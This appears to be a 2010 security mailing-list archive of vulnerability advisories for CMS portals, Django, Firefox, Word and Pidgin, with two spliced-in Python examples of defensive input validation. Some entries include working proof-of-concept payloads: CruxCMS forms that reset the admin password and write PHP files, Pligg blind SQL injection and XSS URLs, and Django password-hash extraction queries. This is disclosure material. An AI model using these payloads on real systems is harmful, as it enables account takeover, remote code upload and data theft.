Sigma Portal Denial of Service Vulnerability

2010-12-27 Thread info
# 
# Securitylab.ir
# 
# Application Info:
# Name: Sigma Portal
# Vendor: http://www.sigma.ir
# 
# Vulnerability Info:
# Type: Denial of Service
# Risk: Medium
# 2010-08-11 - Vendor notified
#
Vulnerability:
http://site.ir/Portal/Picture/ShowObjectPicture.aspx?Width=%2791Height=1099000-=ObjectType=NewsObjectID=(Picture ID)

By setting large values for width and height it is possible to create a
large load on the server.
# 
# Discovered By: Pouya Daneshmand
# Website: http://Securitylab.ir
# Contacts: info[at]securitylab.ir  whh_iran[at]yahoo.com
###


[security bulletin] HPSBST02619 SSRT100281 rev.2 - HP StorageWorks Storage Mirroring, Remote Execution of Arbitrary Code

2010-12-27 Thread security-alert
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02660122
Version: 2

HPSBST02619 SSRT100281 rev.2 - HP StorageWorks Storage Mirroring, Remote 
Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2010-12-20
Last Updated: 2010-12-22

Potential Security Impact: Remote execution of arbitrary code

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP StorageWorks 
Storage Mirroring. This vulnerability could be exploited remotely to execute 
arbitrary code.

References: CVE-2010-4116, ZDI-CAN-958

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP StorageWorks Storage Mirroring v5 prior to v5.2.2.1771.2

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference              Base Vector                Base Score
CVE-2010-4116    (AV:N/AC:L/Au:N/C:C/I:C/A:C)         10.0
===========================================================
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Abdul Aziz Hariri of ThirdEyeTesters along 
with TippingPoint's Zero Day Initiative for reporting this vulnerability to 
security-al...@hp.com.

RESOLUTION

HP has provided HP StorageWorks Storage Mirroring v5.2.2.1771.2 to resolve the 
vulnerability.

Customers can receive HP StorageWorks Storage Mirroring v5.2.2.1771.2 or 
subsequent by contacting the normal HP Services support channel.

HISTORY
Version:1 (rev.1) - 20 December 2010 Initial release
Version:2 (rev.2) - 20 December 2010 Added TippingPoint to the acknowledgement 
in the Background section

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-al...@hp.com
  Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NAlangcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
-check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
-verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.

To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters
of the Bulletin number in the title:

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to 
maintain system integrity. HP is continually reviewing and enhancing the 
security features of software products to provide customers with current secure 
solutions.

HP is broadly distributing this Security Bulletin in order to bring to the 
attention of users of the affected HP products the important security 
information contained in this Bulletin. HP recommends that all users determine 
the applicability of this information to their individual situations and take 
appropriate action. HP does not warrant that this information is necessarily 
accurate or complete for all user situations and, consequently, HP will not be 
responsible for any damages resulting from user's use or disregard of the 
information provided in this Bulletin. To the extent permitted by law, HP 
disclaims all warranties, either express or implied, including the warranties 
of merchantability and fitness for a particular purpose, title and 
non-infringement.

Copyright 2009 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors 
or omissions contained herein. The information provided is provided as is 

Secunia Research: Microsoft Word LFO Parsing Double-Free Vulnerability

2010-12-27 Thread Secunia Research
======================================================================

                     Secunia Research 23/12/2010

      - Microsoft Word LFO Parsing Double-Free Vulnerability -

======================================================================
Table of Contents

1) Affected Software
2) Severity
3) Vendor's Description of Software
4) Description of Vulnerability
5) Solution
6) Time Table
7) Credits
8) References
9) About Secunia
10) Verification

== 
1) Affected Software 

* Microsoft Word 2002 (10.6856.6858) SP3

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Highly critical
Impact: System access
Where:  From remote

== 
3) Vendor's Description of Software 

Office Word ... provides editing and reviewing tools that help you
create professional documents more easily than ever before.

Product Link:
http://office.microsoft.com/en-us/word/default.aspx

== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Microsoft Word, 
which can be exploited by malicious people to potentially compromise 
a user's system.

The vulnerability is caused by a double-free error when processing LFO
(List Format Override) records and can be exploited to corrupt memory 
via a specially crafted Word document.

Successful exploitation may allow execution of arbitrary code.

== 
5) Solution 

Apply patches provided by MS10-079.

== 
6) Time Table 

25/05/2010 - Vendor notified.
25/05/2010 - Vendor response.
22/12/2010 - Vendor informs that due to a mishap the vulnerability
 report fell off their radar. The vulnerability has in the 
 meantime been fixed by MS10-079, which will be updated 
 accordingly with proper credits.
23/12/2010 - Public disclosure.

== 
7) Credits 

Discovered by Alin Rad Pop, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2010-3217 for the vulnerability.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-76/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==


Asan Portal (IdehPardaz) Multiple Vulnerabilities

2010-12-27 Thread info
#
# Securitylab.ir
#
# Application Info:
# Name: Asan Portal
# Vendor: http://iptech.ir/default.aspx?id=130
#
Vulnerability:

##
# Denial of Service:
##

http://site.ir/Modules/Administrative/ShowPhotos/ShowImages.aspx?id=922&FieldName=Content_Image1&w=1000&h=1000

By setting large values for width and height it is possible to create a large
load on the server.

##
# SQL Injection:
##

http://site.ir//Modules/Administrative/ShowPhotos/ShowImages.aspx?FieldName=Content_Image1&h=75&id=%24[SQL Injection]&w=75

#
# Discovered By: Securitylab.ir
# Website: http://Securitylab.ir
# Contacts: info[at]securitylab.ir
###
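Both Securitylab.ir reports above (Sigma Portal and Asan Portal) describe the same two server-side mistakes: image dimensions taken from the query string without an upper bound, and an `id` parameter passed on without being checked as a number. The following Python is an added example and is not code from either vendor or from Securitylab.ir. It shows the validation an image-thumbnail handler of this kind needs before it touches the database or the image library: the parameter names `w`, `h` and `id` are taken from the Asan URLs, while the limits (`MAX_WIDTH`, `MAX_HEIGHT`, `MAX_PIXELS`) are constructed for the example and would be tuned to the real server.

```python
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

# Constructed limits for this example: a real deployment sizes them to its hardware.
MAX_WIDTH = 2000
MAX_HEIGHT = 2000
MAX_PIXELS = 2_000_000          # width * height budget for a single resize job

DIM_RE = re.compile(r"^[0-9]{1,7}$")           # ASCII digits only, bounded length
ID_RE = re.compile(r"^[1-9][0-9]{0,9}$")       # positive integer, no signs or metacharacters


class BadRequest(ValueError):
    """Raised for any parameter that should be answered with HTTP 400, not processed."""


@dataclass(frozen=True)
class ResizeRequest:
    object_id: int
    width: int
    height: int


def parse_dimension(raw, limit, name):
    """A width/height parameter must be digits only and within 1..limit."""
    if raw is None or not DIM_RE.match(raw):
        raise BadRequest(f"{name} must be a positive integer")
    value = int(raw)
    if value < 1 or value > limit:
        raise BadRequest(f"{name} out of range 1..{limit}")
    return value


def parse_object_id(raw):
    """The record id is validated as an integer *before* any SQL is built from it."""
    if raw is None or not ID_RE.match(raw):
        raise BadRequest("id must be a positive integer")
    return int(raw)


def validate_resize_params(params):
    """params: mapping of query-string name -> value, as a web framework supplies it."""
    width = parse_dimension(params.get("w"), MAX_WIDTH, "w")
    height = parse_dimension(params.get("h"), MAX_HEIGHT, "h")
    # Each dimension may be individually legal yet the product still too large to allocate.
    if width * height > MAX_PIXELS:
        raise BadRequest("requested image exceeds pixel budget")
    return ResizeRequest(parse_object_id(params.get("id")), width, height)


def check_url(url):
    """Return (True, ResizeRequest) for an acceptable ShowImages-style URL,
    or (False, reason) when the request must be refused."""
    query = parse_qs(urlsplit(url).query)
    params = {key: values[0] for key, values in query.items()}
    try:
        return True, validate_resize_params(params)
    except BadRequest as exc:
        return False, str(exc)


if __name__ == "__main__":
    for sample in (
        "http://site.ir/Modules/Administrative/ShowPhotos/ShowImages.aspx?id=922&FieldName=Content_Image1&w=1000&h=1000",
        "http://site.ir/Modules/Administrative/ShowPhotos/ShowImages.aspx?id=922&w=1000000&h=1000000",
        "http://site.ir/Modules/Administrative/ShowPhotos/ShowImages.aspx?FieldName=Content_Image1&h=75&id=%24[SQL%20Injection]&w=75",
    ):
        print(check_url(sample))
```

The pixel-budget check matters independently of the per-dimension caps: two values that each pass the cap can still multiply into an allocation that starves the server, which is exactly the failure the two advisories describe.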


[waraxe-2010-SA#078] - Multiple Vulnerabilities in CruxCMS 3.0.0

2010-12-27 Thread come2waraxe
[waraxe-2010-SA#078] - Multiple Vulnerabilities in CruxCMS 3.0.0
===

Author: Janek Vind waraxe
Date: 27. December 2010
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-78.html


Affected Software:
~~~

CruxCMS is a lightweight, easy to use website content management system (CMS).
It is written in PHP and uses the powerful MySQL database.

http://www.cruxsoftware.co.uk/cruxcms.php


Affected versions
~~~

Tests were conducted against CruxCMS version 3.0.0

###
1. Unauthorized password reset in manager/passwordreset.php
###

Reason: directly accessible php script
Attack vectors: user submitted POST parameters ID and Password
Preconditions: none
Impact: attacker can take over CruxCMS admin account

PHP script manager/passwordreset.php is directly accessible via web
without any authorization. Source code snippet:

-[ source code start ]-
include ("../includes/injectionprevention.php");

$ID = numericquery($_POST["ID"]) ;

if (isset($ID)) {

$Password = preventinjection($_POST["Password"]);
$Password2 = md5($Password);

//Connect to database
include ("../includes/dbinfo.php");

// Insert data
$sqlquery = "UPDATE " . usersdb . " SET "
."Password ='" .$Password2 ."' WHERE ID ='" .$ID ."'";

$results = mysql_query($sqlquery);
-[ source code end ]---

Example exploit:
---
<html>
<head><title>CruxCMS 3.0.0 Unauthorized Password Reset PoC by waraxe</title></head>
<body><center>
<form action="http://localhost/cruxcms.3.0.0/manager/passwordreset.php" method="post">
<input type="hidden" name="ID" value="1">
<input type="hidden" name="Password" value="waraxe">
<input type="submit" value="Test!">
</form>
</center></body></html>
---


###
2. Arbitrary file upload in manager/processeditor.php
###

Reason: directly accessible php script
Attack vector: specially crafted POST request
Preconditions: none
Impact: attacker is able to write remote php files to any location.

PHP script manager/processeditor.php is directly accessible via web
without any authorization. Source code snippet:

-[ source code start ]-
$Name = preventinjection($_POST["name"]) ;
if (isset($_POST['Type'])) {
$Type = $_POST['Type'];
}

..

$head = $_POST["head"] ;
$headlink = $Name . ".php";

if ($Type == "Add") {

..

$fileopen = fopen($headlink, 'w') or die("can't open file");
fwrite($fileopen, $head);
fclose($fileopen);
-[ source code end ]---

Example exploit:
---
<html>
<head><title>CruxCMS 3.0.0 processeditor.php File Upload PoC by waraxe</title></head>
<body><center>
<form action="http://localhost/cruxcms.3.0.0/manager/processeditor.php" method="post">
<input type="hidden" name="Type" value="Add">
<input type="hidden" name="name" value="../images/info">
<input type="hidden" name="head" value="<?phpinfo();?>">
<input type="submit" value="Test!">
</form>
</center></body></html>
---
For testing, first make sure that the images directory is writable by PHP.
Open the HTML file above and click the Test! button. After a successful POST
request the newly written remote file can be accessed like this:

http://localhost/cruxcms.3.0.0/images/info.php


###
3. Arbitrary file upload in manager/processfile.php
###

Reason: directly accessible php script
Attack vector: specially crafted POST request
Preconditions: none

Example exploit:
---
<html>
<head><title>CruxCMS 3.0.0 processfile.php File Upload PoC by waraxe</title></head>
<body><center>
<form action="http://localhost/cruxcms.3.0.0/manager/processfile.php"
enctype="multipart/form-data" method="post">
<input type="hidden" name="Action" value="Add">
<input type="file" name="uploadedfile" size="40">
<input type="submit" value="Test!">
</form>
</center></body></html>
---
For testing, first make sure that the Uploads/Misc/ directory is writable by PHP.
Open the HTML file above and click the Test! button. After a successful POST
request the newly written remote file can be accessed like this:

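The three CruxCMS findings share one root cause (manager scripts reachable without any login) and, for issues 2 and 3, a second one: a user-supplied name is concatenated into a file path and written to disk, so `../images/info` lands outside the intended directory. The block below is an added example, not CruxCMS code and not waraxe's, written in Python rather than PHP so that it can be run as-is; `manager_authenticated`, `safe_target_path` and `handle_editor_request` are names constructed for the example. It shows the two controls a processeditor-style handler needs: an authentication gate evaluated before anything else, and a file-name allowlist backed by a `realpath` containment check so a name can never resolve outside the base directory.

```python
import os
import re
import tempfile

# Names are restricted to a short, safe alphabet: no '/', no '..', no NUL, no extension games.
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


class UnsafeName(ValueError):
    """The supplied name is not an acceptable file name for this handler."""


def safe_target_path(base_dir, name, extension=".php"):
    """Map a user-supplied base name to a file inside base_dir, or raise.

    Two independent checks: the allowlist on the name, and a realpath containment
    check on the resolved result (which also catches symlinked parents)."""
    if not SAFE_NAME_RE.match(name):
        raise UnsafeName(f"rejected name {name!r}")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name + extension))
    if os.path.commonpath([base, target]) != base:
        raise UnsafeName("target escapes base directory")
    return target


def handle_editor_request(session, form, base_dir):
    """Hardened counterpart of the processeditor.php 'Add' flow (illustration only).

    session: dict of the caller's server-side session; form: dict of POST fields.
    Returns the path written; raises PermissionError or UnsafeName otherwise."""
    # The original scripts are missing exactly this gate.
    if not session.get("manager_authenticated"):
        raise PermissionError("manager login required")
    if form.get("Type") != "Add":
        raise ValueError("unsupported Type")
    target = safe_target_path(base_dir, form.get("name", ""))
    # 'x' mode refuses to overwrite: existing templates cannot be clobbered.
    with open(target, "x", encoding="utf-8") as handle:
        handle.write(form.get("head", ""))
    return target


def demo():
    """Run the three scenarios from the advisory against a throwaway directory."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        templates = os.path.join(root, "templates")
        os.mkdir(templates)
        good = {"Type": "Add", "name": "header", "head": "<h1>site</h1>"}
        traversal = {"Type": "Add", "name": "../images/info", "head": "anything"}
        try:
            handle_editor_request({}, good, templates)
            results["unauthenticated"] = "written"
        except PermissionError:
            results["unauthenticated"] = "denied"
        session = {"manager_authenticated": True}
        try:
            handle_editor_request(session, traversal, templates)
            results["traversal"] = "written"
        except UnsafeName:
            results["traversal"] = "denied"
        path = handle_editor_request(session, good, templates)
        results["legit"] = os.path.basename(path)
        results["legit_inside"] = os.path.dirname(path) == os.path.realpath(templates)
    return results


if __name__ == "__main__":
    print(demo())
```

The allowlist alone would already stop the `../images/info` case; the containment check is kept because it protects against a class of mistakes the allowlist does not see, such as a base directory that is itself a symlink into the document root.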

[ MDVSA-2010:251-2 ] firefox

2010-12-27 Thread security
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2010:251-2
 http://www.mandriva.com/security/
 ___

 Package : firefox
 Date: December 24, 2010
 Affected: 2010.0
 ___

 Problem Description:

 Security issues were identified and fixed in firefox:
 
 Security researchers Yosuke Hasegawa and Masatoshi Kimura reported that
 the x-mac-arabic, x-mac-farsi and x-mac-hebrew character encodings are
 vulnerable to XSS attacks due to some characters being converted to
 angle brackets when displayed by the rendering engine. Sites using
 these character encodings would thus be potentially vulnerable to
 script injection attacks if their script filtering code fails to
 strip out these specific characters (CVE-2010-3770).
 
 Google security researcher Michal Zalewski reported that when a
 window was opened to a site resulting in a network or certificate
 error page, the opening site could access the document inside the
 opened window and inject arbitrary content. An attacker could use
 this bug to spoof the location bar and trick a user into thinking
 they were on a different site than they actually were (CVE-2010-3774).
 
 Mozilla security researcher moz_bug_r_a4 reported that the fix for
 CVE-2010-0179 could be circumvented permitting the execution of
 arbitrary JavaScript with chrome privileges (CVE-2010-3773).
 
 Security researcher regenrecht reported via TippingPoint's Zero
 Day Initiative that JavaScript arrays were vulnerable to an integer
 overflow vulnerability. The report demonstrated that an array could
 be constructed containing a very large number of items such that when
 memory was allocated to store the array items, the integer value used
 to calculate the buffer size would overflow resulting in too small a
 buffer being allocated. Subsequent use of the array object could then
 result in data being written past the end of the buffer and causing
 memory corruption (CVE-2010-3767).
 
 Security researcher regenrecht reported via TippingPoint's Zero Day
 Initiative that a nsDOMAttribute node can be modified without informing
 the iterator object responsible for various DOM traversals. This
 flaw could lead to an inconsistent state where the iterator points
 to an object it believes is part of the DOM but actually points to
 some other object. If such an object had been deleted and its memory
 reclaimed by the system, then the iterator could be used to call into
 attacker-controlled memory (CVE-2010-3766).
 
 Security researcher Gregory Fleischer reported that when a Java
 LiveConnect script was loaded via a data: URL which redirects via a
 meta refresh, then the resulting plugin object was created with the
 wrong security principal and thus received elevated privileges such
 as the abilities to read local files, launch processes, and create
 network connections (CVE-2010-3775).
 
 Mozilla added the OTS font sanitizing library to prevent downloadable
 fonts from exposing vulnerabilities in the underlying OS font
 code. This library mitigates against several issues independently
 reported by Red Hat Security Response Team member Marc Schoenefeld
 and Mozilla security researcher Christoph Diehl (CVE-2010-3768).
 
 Security researcher wushi of team509 reported that when a XUL
 tree had an HTML <div> element nested inside a <treechildren>
 element then code attempting to display content in the XUL tree would
 incorrectly treat the <div> element as a parent node to tree content
 underneath it resulting in incorrect indexes being calculated for the
 child content. These incorrect indexes were used in subsequent array
 operations which resulted in writing data past the end of an allocated
 buffer. An attacker could use this issue to crash a victim's browser
 and run arbitrary code on their machine (CVE-2010-3772).
 
 Security researcher echo reported that a web page could open a window
 with an about:blank location and then inject an <isindex> element
 into that page which upon submission would redirect to a chrome:
 document. The effect of this defect was that the original page would
 wind up with a reference to a chrome-privileged object, the opened
 window, which could be leveraged for privilege escalation attacks
 (CVE-2010-3771).
 
 Dirk Heinrich reported that on Windows platforms when document.write()
 was called with a very long string a buffer overflow was caused in line
 breaking routines attempting to process the string for display. Such
 cases triggered an invalid read past the end of an array causing a
 crash which an attacker could potentially use to run arbitrary code
 on a victim's computer (CVE-2010-3769).
 
 Mozilla developers identified and fixed several memory safety
 bugs in the browser engine used in Firefox and other 

Django admin list filter data extraction / leakage

2010-12-27 Thread Adam Baldwin
ADVISORY INFORMATION:
Advisory ID: NGENUITY-2010-009
Date discovered: 8.28.2010
Date published: 12.22.2010

SOFTWARE AFFECTED:
“Django is a high-level Python Web framework that encourages rapid
development and clean, pragmatic design.” [1]
The admin interface of the Django web framework can be abused to extract
information, such as user password hashes via list filters. Version
1.1.2, 1.2.3 and before are affected. The advisory from the Django dev
team can be found here [2].

TECHNICAL DETAILS:
The principle behind the vulnerability is similar to blind SQL
injection, but abuses a feature of the admin interface. We can use list
filters to follow foreign keys into models and data our user should not
normally have access to. Using regular expressions gives us a lot of
flexibility to work our way down the value we want to extract.

For a model that has a created_by field that points to a User object we
could extract the password hash using a request similar to the below.
http://example.com/admin/testapp/testmodel/?created_by__password__regex=^sha1\$[0-9]$
http://example.com/admin/testapp/testmodel/?created_by__password__regex=^sha1\$[a-f]$


Authentication as a staff user in the admin is required to exploit this
vulnerability. Here's looking at you CMS apps!

CREDIT:
This vulnerability was discovered by Adam Baldwin
mailto:adam_bald...@ngenuity-is.com
REFERENCES:
[1] - http://www.djangoproject.com
[2] - http://www.djangoproject.com/weblog/2010/dec/22/security/
[3] -
http://ngenuity-is.com/advisories/2010/dec/22/information-leakage-in-django-administrative-inter/
[4] -
http://evilpacket.net/2010/dec/22/information-leakage-django-administrative-interfac/




[ MDVSA-2010:259 ] pidgin

2010-12-27 Thread security
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:259
 http://www.mandriva.com/security/
 ___

 Package : pidgin
 Date: December 23, 2010
 Affected: 2009.0, 2010.0, 2010.1
 ___

 Problem Description:

 A null pointer dereference due to receiving a short packet for a direct
 connection in the MSN code could potentially cause a denial of service.
 
 Packages for 2009.0 are provided as of the Extended Maintenance
 Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 This update provides pidgin 2.7.8 that has been patched to address
 this flaw.
 ___

 References:

 http://pidgin.im/news/security/
 ___

 Updated Packages:

 Mandriva Linux 2009.0:
 c268cfea5df24d94a1fce4ed9e9c8e2b  2009.0/i586/finch-2.7.8-0.2mdv2009.0.i586.rpm
 1b83a79a24630273cb0fd6de36063d01  2009.0/i586/libfinch0-2.7.8-0.2mdv2009.0.i586.rpm
 5ac73ba5e6b8f422fdd2dc8216112072  2009.0/i586/libpurple0-2.7.8-0.2mdv2009.0.i586.rpm
 297f0cdd8b87c5cd4909c3c6fbe1ac31  2009.0/i586/libpurple-devel-2.7.8-0.2mdv2009.0.i586.rpm
 e57619f18b1e859ee22631c2f393be6b  2009.0/i586/pidgin-2.7.8-0.2mdv2009.0.i586.rpm
 0b317674aa0aa78c7b2601ebd66ef886  2009.0/i586/pidgin-bonjour-2.7.8-0.2mdv2009.0.i586.rpm
 e2e068ed1acc961c256fb5fb3a6bc4a7  2009.0/i586/pidgin-client-2.7.8-0.2mdv2009.0.i586.rpm
 409b5693a3d350d54a6b1b07dcfe4e88  2009.0/i586/pidgin-gevolution-2.7.8-0.2mdv2009.0.i586.rpm
 64d503c98a0048ecae1f6959e1902c7b  2009.0/i586/pidgin-i18n-2.7.8-0.2mdv2009.0.i586.rpm
 2fd2ea0ba84497c5dd778b8a4996a446  2009.0/i586/pidgin-meanwhile-2.7.8-0.2mdv2009.0.i586.rpm
 195a0fca668c2cb8b049aa2f878d6b99  2009.0/i586/pidgin-perl-2.7.8-0.2mdv2009.0.i586.rpm
 eab1d0f42237cb2de2bf0dcdb60c01f5  2009.0/i586/pidgin-plugins-2.7.8-0.2mdv2009.0.i586.rpm
 df33bb5b86bd903aa82e31b3ae2c7405  2009.0/i586/pidgin-silc-2.7.8-0.2mdv2009.0.i586.rpm
 356ff080f65bc0e6dbff9f3292ab35ed  2009.0/i586/pidgin-tcl-2.7.8-0.2mdv2009.0.i586.rpm
 6fe3a267b0c994c98252defc0229d73f  2009.0/SRPMS/pidgin-2.7.8-0.2mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 07cbd9d2d40cb069ea315cb55dc1d5b9  2009.0/x86_64/finch-2.7.8-0.2mdv2009.0.x86_64.rpm
 2759f7a76653f15d33e23828041e775d  2009.0/x86_64/lib64finch0-2.7.8-0.2mdv2009.0.x86_64.rpm
 f120e2602535fdd5736a3f0051d97648  2009.0/x86_64/lib64purple0-2.7.8-0.2mdv2009.0.x86_64.rpm
 c477958fdb03426af9cd29a7da91373d  2009.0/x86_64/lib64purple-devel-2.7.8-0.2mdv2009.0.x86_64.rpm
 e7d575b135dc40ffe447e85958e89f0f  2009.0/x86_64/pidgin-2.7.8-0.2mdv2009.0.x86_64.rpm
 0ba47012d00f1682c00fd9b87072129e  2009.0/x86_64/pidgin-bonjour-2.7.8-0.2mdv2009.0.x86_64.rpm
 55eeaf467e82d003abf5de61b65f5ae0  2009.0/x86_64/pidgin-client-2.7.8-0.2mdv2009.0.x86_64.rpm
 4478c7c5301da7fcb78c989eb18d9497  2009.0/x86_64/pidgin-gevolution-2.7.8-0.2mdv2009.0.x86_64.rpm
 448777d63afc82270d18b2a99fa5294a  2009.0/x86_64/pidgin-i18n-2.7.8-0.2mdv2009.0.x86_64.rpm
 51080c450cb241977de0a5c94564c368  2009.0/x86_64/pidgin-meanwhile-2.7.8-0.2mdv2009.0.x86_64.rpm
 7e8cb3ebcd3b71134ee00761766d6407  2009.0/x86_64/pidgin-perl-2.7.8-0.2mdv2009.0.x86_64.rpm
 2f06b7d807934fdb4a3ada32e7e1dcc7  2009.0/x86_64/pidgin-plugins-2.7.8-0.2mdv2009.0.x86_64.rpm
 123067587dab1f25871be80313bba3c5  2009.0/x86_64/pidgin-silc-2.7.8-0.2mdv2009.0.x86_64.rpm
 d7d55cb2e4ca769ea94a3a44690bc7d1  2009.0/x86_64/pidgin-tcl-2.7.8-0.2mdv2009.0.x86_64.rpm
 6fe3a267b0c994c98252defc0229d73f  2009.0/SRPMS/pidgin-2.7.8-0.2mdv2009.0.src.rpm

 Mandriva Linux 2010.0:
 9c7d51a088df133d4caa4b8059ba821a  2010.0/i586/finch-2.7.8-0.2mdv2010.0.i586.rpm
 8dedd9ee7739e0ed384df88f63501412  2010.0/i586/libfinch0-2.7.8-0.2mdv2010.0.i586.rpm
 f67e74064a653bb9a2812eb78a307cff  2010.0/i586/libpurple0-2.7.8-0.2mdv2010.0.i586.rpm
 3483a4e99e028e5b09ea0165b176c037  2010.0/i586/libpurple-devel-2.7.8-0.2mdv2010.0.i586.rpm
 5117c80ad19c56b39280f7c3dfdd1872  2010.0/i586/pidgin-2.7.8-0.2mdv2010.0.i586.rpm
 dc33975bc058eb24168e029967889c5b  2010.0/i586/pidgin-bonjour-2.7.8-0.2mdv2010.0.i586.rpm
 b9104754d162f03f083da877997c9150  2010.0/i586/pidgin-client-2.7.8-0.2mdv2010.0.i586.rpm
 1013da7e359b8cc576ebea1aebbfcce6  2010.0/i586/pidgin-i18n-2.7.8-0.2mdv2010.0.i586.rpm
 a686ada4efeea86b8bff3b1a861084f3  2010.0/i586/pidgin-meanwhile-2.7.8-0.2mdv2010.0.i586.rpm
 361dc60eeeabf18fe147aa636c94c04f  2010.0/i586/pidgin-perl-2.7.8-0.2mdv2010.0.i586.rpm
 a001335057f3aebd6733378469d58871  2010.0/i586/pidgin-plugins-2.7.8-0.2mdv2010.0.i586.rpm
 0cdc172b5dc0b62f0468c4ed00a4141d  2010.0/i586/pidgin-silc-2.7.8-0.2mdv2010.0.i586.rpm
 6d09b87891d3b38b4b7a70a6a69261d2  

Re: [IMF 2011] 2nd Call - Deadline Extended - Addendum

2010-12-27 Thread Oliver Goebel

Addendum:

Merry Christmas to everyone!

Ollie
-- 
Oliver Goebel  mailto:goe...@cert.uni-stuttgart.de
Stabsstelle DV-Sicherheit (RUS-CERT) Tel:+49 711 685 1 CERT
Universitaet Stuttgart   Tel:+49 711 685 8-3678 / Fax:-3688
Breitscheidstr. 2, 70174 Stuttgart   http://CERT.Uni-Stuttgart.DE/



Pligg XSS and SQL Injection

2010-12-27 Thread mike
Credit: Michael Brooks
Bug Fix in 1.1.2:
http://www.pligg.com/blog/1174/pligg-cms-1-1-2-release/

Special thanks to Eric Heikkinen for patching these quickly.

Blind SQL Injection
http://host/pligg_1.1.2/search.php?adv=1&status='and+sleep(9)or+sleep(9)or+1%3D'&search=on&advancesearch= Search+&sgroup=on&stags=0&slink=on&scategory=on&scomments=0&suser=0

XSS:
http://host/pligg_1.1.2/?xss='onmouseover=alert(1);//
http://host/pligg_1.1.2/?search=; onclick=alert(1) a=


The onclick event can be used as reflective xss on /register.php using the 
following post variables:
reg_username
reg_email
reg_password
reg_password2


[IMF 2011] 2nd Call - Deadline Extended

2010-12-27 Thread Oliver Goebel
Dear all,

the deadline for the submission of papers to IMF 2011 has been extended.

Accepted papers will be published in IEEE Computer Society's Conference
Proceedings Series and be available in the IEEE online Digital Library.

Please excuse possible cross-postings.



CALL FOR PAPERS

   IMF 2011

  6th International Conference
   on IT Security Incident Management & IT Forensics

 May 10th - 12th, 2011
  Stuttgart, Germany

  DEADLINE EXTENSION!



PAPER SUBMISSION

The deadline for paper submissions has been extended to January 17th,
2011.  Notification of acceptance will be sent on January 31st.
Camera ready paper copies must be submitted until February 7th, 2011.

Papers can be submitted via the page found at:
http://www.imf-conference.org/imf2011/submission.html

Accepted papers will be published in IEEE Computer Society's Conference
Proceedings Series and be available in the IEEE online Digital Library.



Conference Background
-
IT-Security has become a steady concern for all entities operating
IT-Systems. These include enterprises, governmental and non-governmental
organizations, as well as individuals.  Yet, despite high-end
precautionary measures taken, not every attack or security mishap can be
prevented and hence incidents will go on happening.  In such cases
forensic capabilities in investigating incidents in both technical and
legal aspects are vital to understand their issue and feed back the
knowledge gained into the security process.  Documenting the measures
taken to prevent or minimize damage to own or external IT infrastructure
provides legal rear cover if an involved party decides to start
proceedings. In a possible lawsuit emerging from such an incident, its
treatment in a forensically proper way is crucial to be able to possibly
claim for damages or prevent from being threatened by claims of third
parties.  Thus, capable incident response and forensic procedures have
become an essential part of IT infrastructure operations.

In law enforcement IT forensics is an important branch and its
significance constantly increases since IT has become an essential part
in almost every aspect of daily life.  IT systems produce traces and
